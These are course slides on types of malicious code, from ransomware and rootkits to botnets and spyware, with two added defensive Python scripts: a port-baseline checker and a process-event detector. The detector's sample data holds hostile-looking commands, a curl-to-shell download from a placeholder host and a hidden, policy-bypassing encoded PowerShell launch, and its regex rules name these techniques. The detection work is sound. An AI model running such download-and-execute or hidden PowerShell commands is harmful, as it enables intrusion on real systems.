Topic 3 - Malicious Code

This document provides an overview of various types of malicious code, including ransomware, Trojans, worms, rootkits, backdoors, bots, keyloggers, logic bombs, viruses, spyware, potentially unwanted programs, and adversarial artificial intelligence. It defines each type of malicious code and describes how they function to harm systems, steal information, or gain unauthorized access. The document emphasizes that prevention requires a combination of tools like antivirus software alongside security best practices and user awareness training.

Uploaded by s.l.mills86

ITI581 CYBER SECURITY FUNDAMENTALS

Topic 3
Malicious Code
Topic Reading

• Chapter 3: Malicious Code.

• Interact content.
Malware

• Malware describes a broad range of software that is designed specifically to cause harm to systems, devices, networks or users.

• Can be used to gather information, gain unauthorized access, elevate privileges and perform unwanted actions resulting in breaches of confidentiality, integrity or availability (C, I or A).

• Comes in many forms:
  • Ransomware.
  • Remote Access Trojans (RATs)/Trojans.
  • Bots.
  • Command-and-control.
Ransomware

• Increasingly common malware that takes over target systems and demands a ransom.

• Crypto ransomware encrypts target systems, rendering them useless, until a ransom is paid.

• Other ransomware may threaten to release confidential information unless a ransom is paid.

• Can be very difficult to recover from, but the best protection is a plain and simple backup.

• Cryptanalysis of the encryption used can be difficult and is often fruitless.


Trojans

• Software that masquerades as legitimate software but actually provides unauthorized access to attackers.

• Require some form of human interaction to spread and operate.

• Remote Access Trojans (RATs) provide unauthorized remote access.

• Often combated using antimalware tools and security awareness training.


Worms

• Are self-replicating.

• Often associated with spreading via attacks on vulnerable services but can
also propagate through automated means such as e-mail or file shares.

• Because they can self-install without human interaction they can be quick
to spread and difficult to stop.
Rootkits

• Malware specifically written to permit unauthorized access to systems via a backdoor.

• Modern rootkits are very good at concealing their presence through:
  • Use of filesystem drivers.
  • Infection of the master boot record (MBR) of disks.

• Detection can be tough because a system infected with a rootkit is untrustworthy.

• Best to use a trusted system to inspect suspected infected systems.

• Rootkit detection looks for signatures and known behaviours.


Backdoors

• Methods and tools that allow bypassing of regular authentication methods.

• Like rootkits, they are sometimes used by manufacturers to provide ongoing access to systems and software.

• Backdoors can sometimes be detected by finding unexpected open ports or services, but some may use legitimate services.
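The open-port check described above, written out as an added example that is not part of these slides: a Python script that parses constructed `ss -ltnp`-style output (sample data, not from a real host) and compares every listening socket against a hypothetical baseline of expected port-to-process pairs, reporting anything off-baseline. As the slide notes, a backdoor hiding inside a legitimate service on an expected port would pass this check, so it should be paired with integrity checks of the service binaries.

```python
import re
from typing import Dict, List, Set

# Constructed sample shaped like `ss -ltnp` output on a Linux host (not real data).
# Port 443 is served by the wrong program and port 5555 is not in the baseline at all.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=812,fd=4))
LISTEN 0      511    0.0.0.0:80          0.0.0.0:*         users:(("nginx",pid=1021,fd=6))
LISTEN 0      5      0.0.0.0:443         0.0.0.0:*         users:(("socat",pid=2207,fd=5))
LISTEN 0      5      127.0.0.1:5555      0.0.0.0:*         users:(("updsvc",pid=2391,fd=3))
"""

# Hypothetical baseline for that host: port -> process names allowed to own it.
BASELINE: Dict[int, Set[str]] = {22: {"sshd"}, 80: {"nginx"}, 443: {"nginx"}}

# One LISTEN row: local address, port, and the first owning process/pid.
LINE_RE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_listeners(ss_output: str) -> List[dict]:
    """Return one record per (port, process, pid); IPv4/IPv6 twins collapse to one."""
    listeners: List[dict] = []
    seen = set()
    for line in ss_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or a row without process information
        key = (int(m["port"]), m["proc"], int(m["pid"]))
        if key in seen:
            continue
        seen.add(key)
        listeners.append({"addr": m["addr"], "port": key[0], "proc": key[1], "pid": key[2]})
    return listeners


def find_unexpected_listeners(ss_output: str, baseline: Dict[int, Set[str]]) -> List[dict]:
    """Flag listeners whose port is not in the baseline or is owned by an unexpected process."""
    findings: List[dict] = []
    for lst in parse_listeners(ss_output):
        allowed = baseline.get(lst["port"])
        if allowed is None:
            findings.append({**lst, "reason": "port not in baseline"})
        elif lst["proc"] not in allowed:
            findings.append({**lst, "reason": "unexpected process on baseline port (expected %s)" % sorted(allowed)})
    # Caveat from the slide: a backdoor living inside a legitimate service on an
    # expected port passes this check, so pair it with binary integrity checks.
    return sorted(findings, key=lambda f: f["port"])


if __name__ == "__main__":
    for f in find_unexpected_listeners(SAMPLE_SS_OUTPUT, BASELINE):
        print("%5d %-8s pid=%-5d %s" % (f["port"], f["proc"], f["pid"], f["reason"]))
```

Run against the constructed sample, the script reports port 443 (owned by `socat` rather than the expected `nginx`) and port 5555 (not in the baseline). Keeping the baseline per host, and refreshing it only through change control, is what makes the comparison meaningful.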
Bots

• Groups of remote-controlled systems or devices that have a malware infection.

• Groups more commonly referred to as botnets.

• Botnets are used to control targets in order to use them to launch various
types of attacks against further target systems.

• Many botnet command and control systems operate in client-server mode.


Botnets

[Figure: the structure of a botnet.]
Source: https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fblog.eccouncil.org%2Fwp-content%2Fuploads%2F2018%2F12%2Fthe-structure-of-a-botnet.png&f=1&nofb=1
Keyloggers

• Programs that, once loaded, may capture keyboard keystrokes, mouse movement, touchscreen inputs or credit card swipes from infected devices.

• Can work in various ways, including capturing via the kernel, through APIs or scripts, or directly from memory.

• Best defense is through best-practice software maintenance and a comprehensive AV/anti-malware solution.
Logic Bombs

• Functions or code maliciously placed inside other programs.

• Are activated when defined conditions are met.

• Uncommon but when activated can create significant issues.


Viruses

• Most well known, widespread and understood of the malware types.

• Are spread via varied infection mechanisms and have many different attack methods and targets.

Virus Type            Description
Memory resident       Remain in memory while the device is running.
Non-memory resident   Execute, spread and then shut down to prevent detection.
Boot sector           Reside on disk boot sectors.
Macro                 Use macros or code inside common applications to spread.
E-mail                Spread via e-mail attachments or flaws within clients.
Spyware

• Designed to obtain information about a target.

• Many different variants and deployment methods.

• May be innocuous but certain types are quite malicious.

• Often associated with identity theft and fraud.

• Most frequently combated using anti-malware tools.

• User awareness is also an important tool.


Potentially Unwanted Programs (PUPs)

• Many types of malware are malicious and cause damage.

• PUPs are different in that they may not cause any harm directly.

• Installed without the user's knowledge or permission.

• Can include adware, browser toolbars, tracking programs and other types.

• PUPs don’t always indicate that a system has been seriously compromised.
Malicious Code

• Includes scripts or bespoke code that isn’t malware but may still be used by attackers.

• Attacks can happen locally or remotely.

• May leverage built-in OS tools such as PowerShell, Visual Basic and macros in Windows environments, or Bash or Python in Linux environments.

• Can be difficult to guard against because they leverage legitimate and well-used tools.
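Because these attacks use tools the OS ships with, defenders look at how the tools are invoked rather than at the tools themselves. The following is an added example (not from the slides) of that kind of detection logic: a Python script that reads constructed process-creation events (tab-separated, invented for this example) and flags PowerShell launched with an encoded command, an execution-policy bypass or a hidden window, an Office application spawning a script host, a download piped straight into a shell, and script files run from a Downloads directory. The event format and the rule names are assumptions for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    ts: str
    user: str
    parent: str   # parent process image name
    image: str    # process image name
    cmdline: str


# Constructed process-creation events (tab-separated), invented for this example.
# Only the first and last rows are benign.
SAMPLE_EVENTS = """\
2024-05-01T09:12:03Z\tjdoe\texplorer.exe\tpowershell.exe\tpowershell.exe -NoProfile Get-ChildItem C:\\Reports
2024-05-01T09:14:40Z\tjdoe\twinword.exe\tpowershell.exe\tpowershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc QUJD
2024-05-01T09:15:02Z\tjdoe\texplorer.exe\twscript.exe\twscript.exe C:\\Users\\jdoe\\Downloads\\invoice.vbs
2024-05-01T09:20:11Z\tops\tbash\tbash\tbash -c "curl -s http://example.invalid/setup.sh | sh"
2024-05-01T09:25:55Z\tops\tsshd\tpython3\tpython3 /opt/tools/report.py --daily
"""

# Office applications that should not normally spawn a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line patterns; the rule names are assumptions for this example.
CMDLINE_RULES = [
    ("powershell_encoded_command", re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+\S", re.I)),
    ("powershell_policy_bypass", re.compile(r"-(?:ep|ex(?:ecutionpolicy)?)\s+bypass", re.I)),
    ("powershell_hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("shell_pipe_from_download", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b", re.I)),
    ("script_from_downloads_dir", re.compile(r"\\downloads\\.*\.(?:vbs|js|ps1|hta)\b", re.I)),
]


def parse_events(raw: str) -> List[ProcEvent]:
    """Split tab-separated rows into events; the command line may itself contain spaces."""
    events: List[ProcEvent] = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t", 4)
        if len(fields) != 5:
            continue  # malformed row, skip rather than crash the pipeline
        events.append(ProcEvent(*fields))
    return events


def match_rules(ev: ProcEvent) -> List[str]:
    """Return the sorted names of every rule the event triggers (empty if benign)."""
    hits: List[str] = []
    if ev.parent.lower() in OFFICE_PARENTS and ev.image.lower() in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    for name, pattern in CMDLINE_RULES:
        if pattern.search(ev.cmdline):
            hits.append(name)
    return sorted(hits)


def suspicious_events(raw: str) -> Dict[str, List[str]]:
    """Map event timestamp -> triggered rules, for events that triggered at least one."""
    result: Dict[str, List[str]] = {}
    for ev in parse_events(raw):
        hits = match_rules(ev)
        if hits:
            result[ev.ts] = hits
    return result


if __name__ == "__main__":
    for ts, rules in suspicious_events(SAMPLE_EVENTS).items():
        print(ts, ", ".join(rules))
```

The ordinary `Get-ChildItem` call and the scheduled `report.py` run produce no findings, while the Word-spawned PowerShell trips four rules at once. Stacking several weak indicators on one event, as here, is what keeps this kind of rule useful on hosts where administrators legitimately use PowerShell and Bash all day.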
Adversarial Artificial Intelligence (AAI)

• A developing field where AI is used to launch attacks.

• Focus is typically on poisoning of data, inserting malicious analytics or algorithms into systems, or privacy-based attacks.
Big Picture

• Malware has many variants.

• Some is malicious and some is simply used to spy on us, advertise products or somehow socially manipulate us.

• Depending on the type of malware, preventing infection and protecting against it can be very challenging.

• Best-practice software configuration, patching and AV tools are a good start.

• Security awareness training assists greatly.


Thanks for watching!
